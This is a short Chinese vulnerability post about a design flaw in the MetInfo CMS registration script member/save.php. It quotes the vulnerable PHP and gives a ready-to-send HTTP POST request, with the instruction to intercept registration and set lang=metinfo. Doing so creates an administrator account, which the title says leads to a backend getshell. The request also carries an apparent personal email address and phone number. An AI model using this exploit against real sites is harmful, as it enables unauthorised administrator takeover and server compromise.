MetInfo最新版设计缺陷可注册管理员用户直接后台getshell

member/save.php [php] get_all($query); $pass1=md5($mm); $query = "INSERT INTO $met_admin_table SET admin_id = '$yhid', admin_pass = '$pass1', admin_tel = '$lxdh', admin_email = '$email', admin_modify_ip = '$m_user_ip', admin_register_date= '$m_now_date', usertype = '{$usertypes[0][id]}', companyname = '$companyname', companyaddress = '$companyaddress', companyfax = '$companyfax', companycode = '$yzbm', companywebsite = '$wz', lang = '$lang', checkid = '$checkid'"; $db->query($query);[/php] 数据库中当usertype为3时即为管理员权限 [php] $query="select * from $met_admin_array where lang='$lang' order by user_webpower asc"; $usertypes=$db->get_all($query); usertype = '{$usertypes[0][id]}' [/php] 由代码可看出当lang=metinfo时,usertype=3 [php] POST /member/save.php?action=add HTTP/1.1 Host: 0day5.com lang=metinfo&yhid=testtest&mm=testtest&mm1=testtest&email=byzhiwen%40vip.qq.com&companyname=ceshia&code=FE2B&lxdh=18210056765&companyfax=&companyaddress=nicai&yzbm=100001&usertype=3&wz= [/php] 注册时截包 改为lang=metinfo

发表评论